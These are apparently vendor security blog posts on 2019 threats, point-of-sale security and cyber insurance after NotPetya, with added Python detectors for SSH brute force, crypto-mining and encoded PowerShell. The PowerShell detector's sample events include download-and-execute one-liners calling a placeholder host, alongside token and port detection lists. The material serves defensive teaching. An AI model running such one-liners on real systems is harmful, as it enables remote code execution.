
Understanding the Types of Cyber Threats on the Rise in 2019

Keeping your IT environment safe means keeping your finger on the pulse of the latest cyber-security threats. However, while there are always new zero-day threats and new attack vectors, each year we see some fundamental repeats. Attackers often find it easy to penetrate networks with poor hygiene: old exploits left unpatched, and authentication weaknesses such as weak passwords and a lack of two-factor authentication. These network threats endanger the security of your enterprise and your public image, and put customer data and privacy at risk.

While some types of cyber threats have been around for many years, as we enter 2019 many are growing in complexity or changing in design. The risk is growing especially as businesses continue to move their workloads and processes to multi-cloud and hybrid-cloud environments. Virtualization and hypervisors, container orchestration, and auto-scaling workloads are all realities of a modern enterprise. If we look at what was new in 2018 and will surely continue in 2019, it is attackers going after critical applications, data centers and clouds directly. To stay secure, manage compliance and keep control despite potential gaps in vendor security, your own solution needs to step up. Businesses will increasingly need to choose a security solution that can manage a hybrid and multi-cloud infrastructure without friction.

Attackers are regularly learning new methods to gain entry or cause damage. Here are the top threats to look out for in 2019.

Direct Attacks on Data Centers and Clouds

What we’ve seen through our work with customers and through the Guardicore Global Sensor Network is an increase in attacks on data centers and clouds directly. These attacks do not rely on targeted spear-phishing campaigns to gain entry through a user inside the enterprise. Instead, attackers find known and zero-day vulnerabilities in applications they can reach directly and exploit them to get inside. In many cases their work is assisted by fundamental weaknesses such as weak passwords and a lack of two-factor authentication. One of Guardicore Labs’ most important finds this year was the Butter campaign. The attackers started by simply brute-forcing SSH servers with weak passwords. Once inside, we found them moving remarkably easily across applications and data centers because of poor segmentation.
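
As an added illustration of the entry point described above (example code written for this page, not Guardicore's tooling and not anything recovered from the Butter campaign), the following Python detector reads OpenSSH auth log lines and flags a source that fails password authentication repeatedly inside a short sliding window, noting whether a login later succeeded from that same source. The log excerpt, hostnames, addresses and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not real traffic): 203.0.113.7 hammers root
# and admin and eventually gets in; 198.51.100.12 is a user who mistypes a
# password once and then logs in with a key.
SAMPLE_LOG = """\
Dec  3 10:00:01 web01 sshd[2311]: Failed password for root from 203.0.113.7 port 51020 ssh2
Dec  3 10:00:02 web01 sshd[2313]: Failed password for root from 203.0.113.7 port 51021 ssh2
Dec  3 10:00:02 web01 sshd[2315]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Dec  3 10:00:03 web01 sshd[2317]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2
Dec  3 10:00:04 web01 sshd[2319]: Failed password for root from 203.0.113.7 port 51024 ssh2
Dec  3 10:00:05 web01 sshd[2321]: Accepted password for root from 203.0.113.7 port 51025 ssh2
Dec  3 10:00:30 web01 sshd[2330]: Failed password for alice from 198.51.100.12 port 40100 ssh2
Dec  3 10:00:35 web01 sshd[2332]: Accepted publickey for alice from 198.51.100.12 port 40101 ssh2
"""

# Matches the standard OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse(line, year=2018):
    """Parse one sshd syslog line; syslog omits the year, so it is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["ip"]


def detect(log_text, max_failures=5, window_seconds=60):
    """Return {ip: finding} for sources with >= max_failures password
    failures inside a sliding window of window_seconds.

    The thresholds are assumptions; tune them to the host's normal login noise."""
    recent = defaultdict(deque)     # ip -> timestamps of recent failures
    users_tried = defaultdict(set)  # ip -> usernames attempted
    findings = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, method, user, ip = rec
        if result == "Failed" and method == "password":
            q = recent[ip]
            q.append(ts)
            users_tried[ip].add(user)
            # Drop failures that have aged out of the window.
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= max_failures and ip not in findings:
                findings[ip] = {"failures": len(q),
                                "users": sorted(users_tried[ip]),
                                "success_after": False}
        elif result == "Accepted" and ip in findings:
            # A successful login after a burst of failures is the real alarm.
            findings[ip]["success_after"] = True
    return findings


if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG).items():
        print(ip, finding)
```

On the sample, only 203.0.113.7 is flagged, with two usernames tried and a successful login after the burst; the legitimate user's single typo never reaches the threshold. In practice the same burst pattern is what fail2ban-style tooling keys on, but the "success_after" flag is the part worth routing to an analyst rather than just a firewall rule.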

While these attacks on data centers are easy to carry out, they remain difficult to spot. In fact, at some companies the security team is not even the one that raises the alarm. Dwell time is cut and mitigation begins not because the enterprise finds the attackers and blocks the threat, but because a third party lets the enterprise know something is wrong. That third party might be a white-hat researcher or a customer; where the attackers are after money, it is often a credit card company or law enforcement that notifies the compromised enterprise.

Crypto-jacking

Many experts failed to predict the rise of cryptocurrency attacks in 2018, but no one is making that mistake this year. Attackers are often financially driven, and mining cryptocurrency is one way to attempt a quick payout, with more reliable results than ransomware. Beyond offering DDoS or RAT as a service to their customers, attackers are seeking an additional revenue stream. In fact, while crypto-jacking has risen 44.5% since 2017, ransomware has dropped by almost 30%. Mining malware often exploits unpatched software and known bugs, such as this year’s Microsoft Windows Server 2003 vulnerability or the Oracle WebLogic flaw.

The impact of these attacks is significant: attackers steal large amounts of CPU time from victims, degrading performance and hurting both the business and its customers. Like a worm, virus or other type of cyber-security threat, crypto-jacking can be hard to find, leaving stakeholders to hunt for the source of the slowdown by trial and error. Visibility into both host resource usage and network traffic is essential, so that you can track CPU consumption per process, spot connections to mining pools, and compare real-time activity against historical baselines.
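
To make the "compare real-time activity to historical baselines" idea concrete, here is an added Python example (not code from the original post or from any Guardicore product) that scores a host snapshot against a per-process CPU baseline and combines that with a second, independent signal: an outbound connection to a stratum-style mining pool port. The baseline, the snapshot, the process names and the port list are constructed assumptions; the port list in particular should come from your own threat intel rather than this hard-coded set.

```python
from statistics import mean, pstdev

# Assumption: ports frequently used by stratum mining pools. Ports alone are
# weak evidence (pools also run on 443), so they are combined with the CPU
# deviation rather than used on their own.
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444, 45700}

# Constructed 7-day baseline: daily average %CPU per process name.
BASELINE = {
    "java":     [42, 45, 40, 47, 44, 43, 41],
    "postgres": [15, 18, 14, 16, 17, 15, 16],
    "sshd":     [0.1, 0.2, 0.1, 0.1, 0.2, 0.1, 0.1],
}

# Constructed current snapshot: (pid, name, cpu_pct, [(dst_ip, dst_port), ...]).
SNAPSHOT = [
    (4101, "java",      46.0, [("10.0.2.15", 5432)]),
    (4122, "postgres",  17.0, []),
    (4210, "sshd",       0.2, [("198.51.100.12", 40101)]),
    (6666, "kworkerds", 97.5, [("203.0.113.200", 14444)]),  # name mimics a kernel thread
    (7001, "java",      93.0, [("203.0.113.201", 443)]),    # known app, unusual CPU
]


def cpu_zscore(name, cpu_pct, baseline):
    """How far the current CPU reading sits above this process's own history,
    in standard deviations. Returns None for a process with no history."""
    hist = baseline.get(name)
    if not hist:
        return None
    mu, sigma = mean(hist), pstdev(hist)
    sigma = max(sigma, 1.0)  # floor so near-constant histories don't blow up the score
    return (cpu_pct - mu) / sigma


def classify(snapshot, baseline, z_threshold=3.0, abs_threshold=90.0):
    """Return {pid: (verdict, reasons)} for processes worth a look.

    "likely-miner": abnormal CPU AND a connection to a stratum-style port.
    "investigate": only one of the two signals fired.
    Thresholds are assumptions to tune per fleet."""
    findings = {}
    for pid, name, cpu, conns in snapshot:
        reasons = []
        z = cpu_zscore(name, cpu, baseline)
        if z is None:
            # No baseline: fall back to an absolute ceiling for unknown names.
            if cpu >= abs_threshold:
                reasons.append(f"unknown process '{name}' at {cpu:.0f}% CPU")
        elif z >= z_threshold:
            reasons.append(f"{name} CPU {cpu:.0f}% is {z:.1f} sigma above its baseline")
        pool_conns = [(ip, p) for ip, p in conns if p in STRATUM_PORTS]
        if pool_conns:
            reasons.append(f"connection to stratum-style port {pool_conns[0][1]}")
        if not reasons:
            continue
        verdict = "likely-miner" if (pool_conns and len(reasons) >= 2) else "investigate"
        findings[pid] = (verdict, reasons)
    return findings


if __name__ == "__main__":
    for pid, (verdict, reasons) in classify(SNAPSHOT, BASELINE).items():
        print(pid, verdict, "; ".join(reasons))
```

On the constructed snapshot the fake "kworkerds" process trips both signals and is reported as a likely miner, while the java process at 93% CPU is flagged for investigation only: a batch job can legitimately spike, and the absence of a pool connection is what keeps it out of the high-confidence bucket.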

APT

An APT, or Advanced Persistent Threat, is an attacker who breaches a network and stays undetected for a long period of time. The goal is not to cause instant damage or demand a ransom immediately, which would draw attention to the breach, but to steal information quietly and unobtrusively. An APT could breach your network using malware, exploit kits, or by piggybacking on legitimate traffic, which makes it difficult to spot. Once inside, an APT could harvest login credentials and use them to move laterally around your data center or wider environment.

The origins of APTs are usually traced to state actors, either government attackers directly or groups they sponsor. Probably the best example this year was the Marriott/SPG breach. With access that began in 2014, the state actor enjoyed years of dwell time in Marriott’s SPG network. The data stolen included names, phone numbers, email addresses, passport numbers, dates of birth, and arrival and departure information.

Personally identifiable data from an attack of this kind could offer an intelligence agency all sorts of very tangible benefits. One example is the ability to produce more convincing forged passports using details taken from real identification documents.

This kind of breach would also provide actionable tracking information, allowing an agency or other bad actor to follow people’s movements. They could see whether someone was checking in at particular locations, or even catch a meeting between multiple people of interest. The data would also let them learn travel patterns and potentially allow intelligence agencies to “intercept” people of interest.

Because APTs and similar threats are designed to go unnoticed, they can be difficult to spot. Signs to look out for include unusual network activity such as spikes in data access. Key defensive tactics include isolating critical data using micro-segmentation and using whitelists to limit communication to only the applications that should be talking to one another.

File-less Malware

One dangerous type of attack typically found as part of an APT is file-less malware. As the name suggests, no file is written to disk, so standard file-based antivirus detection does not catch these breaches. Traditionally, file-less techniques were only the first step of an infection, but in recent months fully file-less attacks have been gaining traction.

These attacks often pivot from an in-memory exploit to highly trusted system tools, and from there to the rest of the network, undetected. The most common file-less techniques are abuse of remote logins, WMI-based attacks, and PowerShell- or Microsoft Office-based execution. In short, no malware file does not mean no breach. Micro-segmentation, especially with well-designed rules and, in more thorough projects, enforcement down to the process level, can keep your most critical applications safe from lateral movement even within the same application cluster, and even against threats you cannot see coming.
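
Because there is no file to scan, file-less PowerShell activity has to be caught from process creation telemetry instead. The added Python example below (written for this page, not part of the original post) decodes the `-EncodedCommand` payload that loaders typically use, then scores each launch on the decoded content plus the parent process. The events are constructed in a simplified "parent, command line" form rather than a real Sysmon or 4688 record, and the token list and scoring weights are assumptions to tune.

```python
import base64
import re

# -EncodedCommand and its short forms (-enc, -ec, -e) followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")

# Assumptions: parents that should rarely spawn PowerShell, and strings that
# recur in download-and-execute one-liners.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wmiprvse.exe", "mshta.exe"}
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                     "frombase64string", "-nop", "bypass", "hidden", "reflection.assembly")


def encode_command(ps):
    """Build an -EncodedCommand argument the way PowerShell expects it
    (UTF-16LE, then base64). Used here only to construct the sample events."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline):
    """Return the decoded script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed process creation events (not real telemetry).
EVENTS = [
    {"pid": 5120, "parent": "WINWORD.EXE",
     "cmd": "powershell.exe -NoP -W Hidden -Enc "
            + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')")},
    {"pid": 5188, "parent": "explorer.exe",
     "cmd": "powershell.exe -EncodedCommand "
            + encode_command("Get-Service | Where-Object {$_.Status -eq 'Running'}")},
    {"pid": 5200, "parent": "WmiPrvSE.exe",
     "cmd": "powershell.exe -nop -c \"$c=(New-Object Net.WebClient).DownloadString('http://203.0.113.9/b'); iex $c\""},
    {"pid": 5300, "parent": "services.exe",
     "cmd": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]


def triage(event):
    """Score one PowerShell launch. Returns None for non-PowerShell processes."""
    cmd = event["cmd"]
    if "powershell" not in cmd.lower():
        return None
    decoded = decode_encoded_command(cmd)
    # Strip the base64 blob before token matching so we score the real script,
    # not random letter runs inside the encoding.
    visible = (ENC_RE.sub(" ", cmd) + " " + (decoded or "")).lower()
    hits = sorted({t for t in SUSPICIOUS_TOKENS if t in visible})
    score = len(hits)
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        score += 2  # Office/WMI parent spawning PowerShell weighs more than any single token
        hits.append(f"parent={event['parent']}")
    return {"pid": event["pid"], "decoded": decoded, "indicators": hits, "score": score}


def triage_all(events, min_score=2):
    """Return findings at or above min_score, in event order."""
    return [r for r in (triage(e) for e in events) if r and r["score"] >= min_score]


if __name__ == "__main__":
    for r in triage_all(EVENTS):
        print(r["pid"], r["score"], r["indicators"])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The encoded admin one-liner from explorer.exe decodes cleanly but scores zero and is dropped, which is the point: encoding by itself is not malicious, and alerting on every `-enc` buries the two launches that matter, the Word-spawned downloader and the WMI-spawned in-line download-and-execute that never used encoding at all.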

Attacks on Critical IoT Devices

The final and perhaps most alarming increase we saw through 2018 is attackers commandeering critical IoT devices. Often unpatched, and typically sitting on flat networks (ones without any segmentation), medical devices were a big target in 2018 and are likely to be exploited further in 2019.

Point-of-sale systems are another environment we have seen grow in popularity with attackers, as they too often suffer from a lack of patching and security hardening, and are an easy target for both physical and remote attacks.

Recognizing how to Ward off These Types of Cyber-Security Threats

The combination of increasingly complex IT environments and increasingly sophisticated cyber threats is a dangerous one. Micro-segmentation reduces the attack surface in the event of a breach, isolating attackers and keeping them away from critical assets and sensitive customer data. Building a smart segmentation strategy starts with a map of your entire IT environment: application dependency mapping that visualizes all the communications and flows in your ecosystem. This visibility and real-time control over your entire infrastructure, from on-premises data centers to multi- and hybrid-cloud IaaS, is essential in 2019 and beyond.


A Deep Dive into Point of Sale Security

Many businesses think of their Point of Sale (POS) systems as an extension of the cashier behind a sales desk. But with multiple risk factors to consider, such as network connectivity, open ports, internet access and communication with the most sensitive data a company handles, POS solutions are more accurately an extension of the company’s data center: a remote branch of its critical applications. Seen this way, they are a high-threat environment, which means they need a targeted security strategy.

Understanding a Unique Attack Surface

Distributed geographically, POS systems sit in varied locations across multiple branches, making it difficult to keep track of each device individually and to monitor their connections as a group. They include in-store terminals as well as public kiosks and self-service stations in places like shopping malls, airports and hospitals. Multiple factors, from a lack of resources to logistical difficulties, can make it nearly impossible to secure these devices at the source or to react quickly enough to a vulnerability or a breach. Remote IT teams often lack the visibility to see data and communication flows accurately. This creates blind spots that prevent a full understanding of the open risks across a spread-out network. Threats are exacerbated further by the vulnerabilities of the old operating systems many POS solutions still run.

Underestimating the extent of this risk could be a devastating oversight. POS solutions are connected to many of a business’s main assets, from customer databases to credit card information and internal payment systems, to name a few. The devices themselves are very exposed, accessible to anyone from a waiter in a restaurant to a passer-by in a department store. This makes them high-risk for physical attacks, such as loading a malicious application over USB, as well as remote attacks such as exploiting the terminal through exposed interfaces. Recently, inherent vulnerabilities were found in mobile POS solutions from vendors including PayPal, Square and iZettle, because of their use of Bluetooth and third-party mobile apps. According to the security researchers who uncovered the vulnerabilities, these “could allow unscrupulous merchants to raid the accounts of customers or attackers to steal credit card data.”

To give system administrators remote access for support and maintenance, POS systems are often connected to the internet, leaving them exposed to remote attacks too. In fact, 62% of attacks on POS environments are carried out through remote access. For business decision makers, ensuring that staff are comfortable using the system needs to be a priority, which makes security a balancing act. A straightforward on-boarding process, a simple UI, and flexibility for non-technical staff are all important, yet they can open up new attack vectors when security considerations are left behind.

One example of a remote attack is the POSeidon malware, which includes a memory scraper and a keylogger so that credit card details and other credentials can be harvested on the infected machine and sent to the attackers. POSeidon gains access through third-party remote support tools such as LogMeIn. From that foothold, attackers have room to move across the business network by escalating privileges and moving laterally.

High risk yet hard to secure, POS systems are a serious security blind spot for many businesses.

Safeguarding this Complex Environment and Getting Ahead of the Threat Landscape

First, assume your POS environment is compromised. You need to ensure that your data is safe and that the attacker cannot move across your network to reach critical assets and core servers. At the top of your list should be preventing an attacker from reaching your payment systems, and protecting customer cardholder information and other sensitive data.

The first step is visibility. While some businesses wait for an operational slowdown or clear evidence of a breach before looking for anomalies, a complex environment needs full contextual visibility into the ecosystem and all application communication within it. Security teams can then accurately identify suspicious activity and where it is taking place, such as which executables are communicating with the internet when they should not be. A system that reports on high-severity incidents shows you what needs to be analyzed further.

Once you have detail on the communication among the critical applications, you can identify expected behavior and create tight segmentation policy. Block rules with application process context can be used to contain any potential threat, ensuring that a future attacker in the data center is isolated without disrupting business processes or affecting performance.

The risk goes in both directions. Next, imagine your POS is secure but your data center is under attack. The POS is an obvious target for an attacker already inside, with links to sensitive data and customer information. Micro-segmentation can protect this valuable environment and stop an attack in progress from getting any further, without limiting the communication your payment system needs to keep business running as usual.

With visibility and clarity, you can create and enforce the right policies, crafted around the strict boundaries within which your POS application needs to communicate, and no further. Examples of policy include:

    • Limiting outgoing internet connections to only the relevant servers and applications
    • Limiting incoming internet connections to only specific machines or labels
    • Building default block rules for ports that are not in use
    • Creating block rules for known malicious processes attempting network connectivity
    • Whitelisting to prevent unauthorized apps from running on the POS
    • Creating strict allow rules that enable only the processes that should communicate, and blocking all other traffic
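
The dependency-mapping step from the first post and the allow-list policy just listed are two halves of one workflow, so here is a single added Python example covering both (written for this page; it is not Guardicore's product, policy language or data). It collapses observed flow records into label-level application dependencies, derives default-deny allow rules from them, and then evaluates candidate flows such as a terminal reaching out to the internet, a terminal talking to a neighbouring terminal, or a compromised database server connecting back into the store. The asset labels, flow records, process names and the `min_hits` learning threshold are all constructed assumptions; a real map would be built from weeks of traffic, not six records.

```python
from collections import defaultdict

# Constructed asset inventory: ip -> (label, site). Labels play the role of
# the "labels" a policy engine attaches to terminals and servers.
ASSETS = {
    "10.10.1.21": ("pos-terminal", "store-101"),
    "10.10.1.22": ("pos-terminal", "store-101"),
    "10.20.0.5":  ("payment-gw",   "dc-core"),
    "10.20.0.9":  ("inventory-db", "dc-core"),
    "10.20.0.40": ("patch-server", "dc-mgmt"),
}

# Constructed flow records from the learning window:
# (src_ip, dst_ip, dst_port, process_name_on_source)
OBSERVED_FLOWS = [
    ("10.10.1.21", "10.20.0.5",  8443, "posapp.exe"),
    ("10.10.1.22", "10.20.0.5",  8443, "posapp.exe"),
    ("10.10.1.21", "10.20.0.9",  1433, "posapp.exe"),
    ("10.10.1.22", "10.20.0.9",  1433, "posapp.exe"),
    ("10.20.0.40", "10.10.1.21", 8080, "patchd.exe"),
    ("10.20.0.40", "10.10.1.22", 8080, "patchd.exe"),
]


def label_of(ip):
    """Anything not in the inventory (e.g. the internet) is 'unknown'."""
    return ASSETS.get(ip, ("unknown", "unknown"))[0]


def build_dependency_map(flows):
    """Collapse per-IP flows into label-level edges:
    {(src_label, dst_label, dst_port, process): hit_count}"""
    edges = defaultdict(int)
    for src, dst, port, proc in flows:
        edges[(label_of(src), label_of(dst), port, proc)] += 1
    return dict(edges)


def derive_policy(dep_map, min_hits=2):
    """Allow rules for every edge seen at least min_hits times in the window.
    Everything else falls through to the implicit default block."""
    return {edge for edge, hits in dep_map.items() if hits >= min_hits}


def evaluate(policy, src_ip, dst_ip, dst_port, process):
    """Return ("allow", rule) or ("block", reason) for a candidate flow."""
    edge = (label_of(src_ip), label_of(dst_ip), dst_port, process)
    if edge in policy:
        return "allow", edge
    # Explain which dimension failed, so an operator can tell "new host"
    # from "known app on a new port" from "unknown process".
    for rule in sorted(policy):
        if rule[:2] == edge[:2] and rule[3] == edge[3]:
            return "block", f"{process} from {edge[0]} to {edge[1]} not permitted on port {dst_port}"
        if rule[:2] == edge[:2]:
            return "block", f"process {process} not allowed from {edge[0]} to {edge[1]}"
    return "block", f"no rule for {edge[0]} -> {edge[1]}"


if __name__ == "__main__":
    policy = derive_policy(build_dependency_map(OBSERVED_FLOWS))
    for rule in sorted(policy):
        print("ALLOW", rule)
    candidates = [
        ("10.10.1.21", "10.20.0.5",   8443, "posapp.exe"),   # normal payment traffic
        ("10.10.1.21", "203.0.113.50", 443, "posapp.exe"),   # terminal to the internet
        ("10.10.1.21", "10.10.1.22",   445, "posapp.exe"),   # terminal to terminal
        ("10.20.0.9",  "10.10.1.21",  4444, "sqlservr.exe"), # data center back into the store
        ("10.10.1.21", "10.20.0.5",   8443, "cmd.exe"),      # right path, wrong process
    ]
    for c in candidates:
        print(*c, "->", evaluate(policy, *c))
```

Because rules are keyed on labels rather than addresses, a new terminal added to the inventory as `pos-terminal` inherits the three rules with no policy change, which is the "automatically copied to any new terminal" behaviour described below. The last candidate is the one to notice: same source, same destination, same port, but cmd.exe instead of posapp.exe, which only process-level policy can block.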

Tight policy means your business can detect any attempt to connect to other services or communicate with an external application, reducing risk and potential damage. With a flexible policy engine, these policies are automatically applied to any new terminal deployed in the network, allowing you to adapt and scale automatically, with no manual moves, adds or changes slowing down business processes.

Don’t Risk Leaving this Essential Touchpoint Unsecured

Point of Sale solutions are a high-risk open door for attackers to access some of your most critical infrastructure and assets. Without adequate protection, a breach could grind your business to a halt and cost you dearly in both financial damage and brand reputation.

Intelligent micro-segmentation policy can isolate an attacker quickly to stop further damage, and establish strong rules that keep your network proactively protected against potential risk. Combined with integrated breach detection capabilities, it allows for quick response and isolation of an attacker before the threat can spread.


Considering Cyber Insurance in the Aftermath of the NotPetya Attack

It has been 18 months since June 2017, when the Petya/NotPetya cyber attack hit businesses around the globe, resulting in dramatic loss of income and intense business disruption. Has cyber insurance limited the fallout for the victims, and should proactive businesses follow suit and make sure they are financially covered in case of a breach?

Monetizing the Impact of Cybercrime

The effect of last year’s wave of cybercrime on the IT and insurance industries continues to grow as businesses disclose silent cyber impacts as well as affirmative losses from WannaCry and NotPetya. The latest reports from Property Claim Services put the loss at over $3.3 billion, and growing.

Despite this, for some businesses reliance on insurance has proven inadequate. US pharmaceutical company Merck disclosed that the NotPetya attack had cost it as much as $580 million since June 2017, and predicted an additional $200 million in costs by the end of 2018. Experts estimated its insurance payout at around $275 million: a large number, but under half of the amount incurred so far, let alone as the silent costs continue to rise.

Other companies have been left even worse off, such as snack food company Mondelez International Inc., which is in an ongoing battle with its property insurer, Zurich American Insurance Company. Mondelez claimed for the NotPetya attack under a policy that covered “all risks of physical loss or damage”, including “physical loss or damage to electronic data, programs, or software, including loss or damage caused by the malicious introduction of a machine code or instruction.”

However, Zurich disputed the claim, citing a clause that excludes coverage for any “hostile or war-like act by any government or sovereign power.” Because US intelligence officials have determined that NotPetya originated as an attack by the Russian military against Ukraine, Zurich is contesting Mondelez’s claim that it is wrongfully denying coverage.

How Does This Lawsuit Affect the Cyber-Insurance Market Overall?

As cyber crime continues to rise, cyber insurance is understandably becoming big business. For companies deciding whether to take out coverage, CISOs need to find room in the budget for ongoing costs and potentially large premiums. For that outlay to be worthwhile, businesses want to be confident they will recover their costs if a breach happens.

The insurance payouts around the NotPetya attack, and the Mondelez case in particular, throw this into question. This is especially true given the rise in cyber attacks that are nation-backed, or that an insurer could plausibly claim to be nation-backed in order to dispute a claim. As regulations change and the US military is given more freedom to launch preventative cyber operations against foreign government hackers, any evidence suggesting governmental or military attribution could legitimately be used against claimants looking to recover their losses.

The Effect on Public Research

The ripple effect could extend beyond the claims sector to security research, and in the long run to free press and journalism, something we feel strongly about at Guardicore Labs. Traditionally, researchers have had the freedom to comment on and even speculate about the attribution of cyber attacks, based on the attackers’ behind-the-scenes behavior and the attack signatures they use. If insurance companies and claims handlers begin using public research as grounds to deny coverage to victims, it could put research teams in an ethical bind, reducing the amount of public research and the transparency of the industry overall.

How Much of a ‘Guarantee’ Can Security Companies Provide?

The question of which claims to honor extends beyond insurers to the financial guarantees offered by security companies. It is increasingly popular to offer guarantees to customers who purchase cybersecurity products, as a way to ‘put your money where your mouth is’ regarding the infallibility of a particular solution.

However, many experts believe these policies have so many loopholes that they negate the benefit of the warranty altogether. One example is the often-cited ‘nation state or act of God’ exception, which includes cyberterrorism. Others exclude coverage for portable devices, insider threats, or intentional acts. Even if you are broadly covered for an event, does that extend to all employees? According to the latest Cyber Insurance Buying Guide, “most policies do not adequately provide for both first-party and third-party loss.”

Your ‘Guarantee’ is not a Guarantee

The bottom line for CISOs looking to protect their business is that cyber insurance is not a catch-all solution. Whether it is insurers paying out a limited figure or avoiding a payout altogether, or cybersecurity companies making big promises that the small print undermines, cyber insurance has a way to go.

Focus on your cybersecurity solution, including strong technology like micro-segmentation to limit the attack surface in the event of a breach. With this in place, your critical assets and data are ring-fenced and isolated, whatever your infrastructure looks like and whichever direction the attack comes from. Integration with strong breach detection and incident response capabilities strengthens your position further, reducing dwell time and giving you a security posture you can rely on.